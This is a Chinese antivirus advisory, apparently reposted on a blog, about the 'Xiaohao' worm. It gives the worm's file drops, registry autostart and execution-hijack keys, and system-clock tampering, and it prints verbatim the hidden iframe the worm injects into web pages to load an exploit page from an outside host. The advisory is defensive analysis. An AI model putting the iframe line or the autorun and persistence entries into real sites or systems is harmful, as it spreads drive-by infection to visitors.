老川的家

一、病毒描述：
　　今日，DSW Lab Avert小组监测到一个具备较强破坏力的名为小浩的蠕虫病毒开始传播，该病毒类似此前曾肆虐网络的熊猫烧香病毒，破坏性感染系统文件，并在受害者系统上遍历网页/脚本文件，插入带毒的网址。因为病毒的破坏性感染行为，导致被感染文件无法修复，严重被感染系统无法使用，会导致用户无法开机现象。

         感染效果截图：

二、病毒基本情况：
　　        病毒名称：Worm.Win32.Xiaohao.a
　　        病毒别名：小浩
　　        病毒类型：蠕虫
　　        危害级别：4
　　        感染平台：Windows 平台
　          编写语言：C/C++

　　三、病毒行为：
　　         1、当病毒体在被感染的系统上激活后，会在磁盘跟目录释放autorun.inf等文件，感染U盘等移动设备：
　　            %DRIVE%\autorun.inf 文件属性：H
　　            %DRIVE%\Xiaohao.exe 文件属性：H

　　         2、同时在跟目录释放一个名为Jilu.txt文件，记录了相关感染文件列表。
　         　3、拷贝自身到系统目录下，全路径： %SystemRoot%\system32\exloroe.exe
　         　4、将自动加入到注册表启动项确保自身启动激活：

　　 　        键路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components
　　　          键名：{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
　　　          键值：%SystemRoot%\system32\exloroe.exe

　         　5、将系统时间修改为2005年1月17日，会导致部分杀毒软件和其他正版软件因授权问题无法激活。
      
　           6、全盘搜索扩展名为*.jsp、*.php、 *.aspx、 *.asp、 *.html、 *.htm的文件，向其中插入病毒网址。
        　      <iframe src=http://xiaohao.yona.biz/*.htm width=0 height=0></iframe>
        　      其中该恶意页面利用多个系统漏洞针对Windows 2000/XP/2003进行有针对性的挂马。

       　      恶意页面的代码截图：

其它行为：
        　      修改注册表使系统无法正常浏览隐藏文件，修改注册表劫持正常的EXE运行，使得运行一些文件会先运行蠕虫自身：
        　      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWAL
       　       shell\Auto\command=Xiaohao.exe
        　      shellexecute=Xiaohao.exe
        　      open=Xiaohao.exe
　　          　当用户打开感染的文件夹时，资源管理器标题会被修改成：已中毒 X14o-H4o's Virus

　　四、解决方案
　　        1、超级巡警已经紧急升级，请广大用户升级到最新特征库来预防病毒。
　　        2、对于网页被感染的用户，可以使用超级巡警的垃圾清理功能来批量修复被感染的网页，具体功能垃圾清理→智能扫描→清除指定代码，勾选后填入病毒植入的恶意网页，点击扫描→清除即可。
　　        3、不要运行来历不明的文件。 

本文由超级巡警提供